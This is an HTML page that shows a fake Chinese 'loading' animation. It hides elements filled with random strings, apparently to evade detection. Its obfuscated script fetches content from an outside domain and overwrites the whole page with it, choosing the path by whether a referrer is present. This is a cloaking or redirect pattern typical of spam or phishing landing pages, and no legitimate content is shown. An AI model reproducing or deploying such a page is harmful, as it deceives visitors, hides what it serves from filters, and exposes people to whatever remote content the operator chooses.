<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .te6zhVnN {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .te6zhVnN .qzH8916hI {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .te6zhVnN .content {
            line-height: 50px;
            text-align: center
        }

        .te6zhVnN .img {
            width: 100%
        }

        .te6zhVnN .umFwWKj {
            text-align: center
        }

        .te6zhVnN .umFwWKj span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .te6zhVnN .umFwWKj span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .te6zhVnN .umFwWKj span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .te6zhVnN .umFwWKj span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .te6zhVnN .umFwWKj span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .te6zhVnN .umFwWKj span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .te6zhVnN .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function XJi8jIlYm8Tp0(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ICOCzub = XJi8jIlYm8Tp0('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ICOCzub +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ICOCzub +".html?a=share";
		}
		
        PrgmL9=url+"#"+new Date().getTime();
        PrgmL9 && function() {
            $.get(PrgmL9, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >qKcVPUgSffFYChxJKR3WfcEALoxS01eIh6aBAk7rS5Qqwc9IxAg8CqoFghqdJP24spINoW</h1>
<li style='display:none' >wdp5seQSlmsScw9qFlUOOr0IsjsDQph3S7tzJrvlwdMRKeZoUq2l7OhbuXR4ztpsTxbicfhYShVET0JMHuQw</li>
<b style='display:none' >evbpOFe0W8N4Q8t98xZRaVZSd5qxWlyXCkRghHmxn</b><div class="te6zhVnN">
    <div class="qzH8916hI">
        <div class="umFwWKj">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>ZnrJeSmoBgPIXjK280LJhlXCFqmF1Iv20fiyPruv5CTdsvxWFzoHDTCmcy</a>
<p  style='display:none'>Y0ADi3MiXNvyj1Tfv2tm6Sv69Urf90EUTxrR7xWWQuHLhIWDbOGR8LOvN07i5FTCKymr5WoztI9DBbo4DlPAwrlIGfS3oev</p>
<h1 style='display:none' >tPpI88VxrVC1E160G6ZQQiEHQPXOIOgnoRUTNVk44LuSwbwK0eyIfGLS3bgo</h1>
<ul style='display:none' >XvzKtoqb9Ly5SUYUa</ul></body>
</html>